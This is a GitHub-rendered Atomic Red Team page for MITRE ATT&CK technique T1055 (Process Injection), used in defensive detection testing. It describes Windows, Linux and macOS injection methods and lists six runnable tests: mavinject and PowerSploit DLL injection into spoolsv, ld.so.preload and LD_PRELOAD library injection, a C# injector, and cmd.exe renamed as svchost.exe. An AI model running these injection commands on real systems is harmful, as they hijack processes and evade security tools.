Skip to content

Latest commit

 

History

History
215 lines (127 loc) · 8.61 KB

T1055.md

File metadata and controls

215 lines (127 loc) · 8.61 KB

T1055 - Process Injection

Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

Windows

There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)

  • Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
  • Portable executable injection involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
  • Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
  • Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
  • Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)

Mac and Linux

Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)

  • LD_PRELOAD, LD_LIBRARY_PATH (Linux), DYLD_INSERT_LIBRARIES (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
  • Ptrace system calls can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
  • /proc/[pid]/mem provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
  • VDSO hijacking performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)

Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

Atomic Tests


Atomic Test #1 - Process Injection via mavinject.exe

Windows 10 Utility To Inject DLLS

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
dll_payload DLL to Inject Path PathToAtomicsFolder\T1055\src\x64\T1055.dll
process_id PID of input_arguments Int (get-process spoolsv).id

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}

Dependencies: Run with powershell!

Description: Utility to inject must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
Get Prereq Commands:
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"


Atomic Test #2 - Process Injection via PowerSploit

PowerShell Injection using PowerSploit Invoke-DLLInjection

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
dll_payload DLL to Inject Path T1055.dll
process_id PID of input_arguments Int (get-process spoolsv).id

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}


Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload

This test adds a shared library to the ld.so.preload list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the glibc package.

Supported Platforms: Linux

Inputs:

Name Description Type Default Value
path_to_shared_library Path to a shared library object Path ../bin/T1055.so

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

echo #{path_to_shared_library} > /etc/ld.so.preload


Atomic Test #4 - Shared Library Injection via LD_PRELOAD

This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the glibc package.

Supported Platforms: Linux

Inputs:

Name Description Type Default Value
path_to_shared_library Path to a shared library object Path /opt/AtomicRedTeam/atomics/T1055/bin/T1055.so

Attack Commands: Run with bash!

LD_PRELOAD=#{path_to_shared_library} ls


Atomic Test #5 - Process Injection via C#

Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques

  1. Process injection
  2. ApcInjectionAnyProcess
  3. ApcInjectionNewProcess
  4. IatInjection
  5. ThreadHijack

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
exe_binary Output Binary Path T1055.exe

Attack Commands: Run with command_prompt!

.\bin\#{exe_binary}


Atomic Test #6 - svchost writing a file to a UNC path

svchost.exe writing a non-Microsoft Office file to a file with a UNC path. This works by copying cmd.exe to a file, naming it svchost.exe, then copying a file to the localhost\c$ folder.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt

Cleanup Commands:

del C:\T1055.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1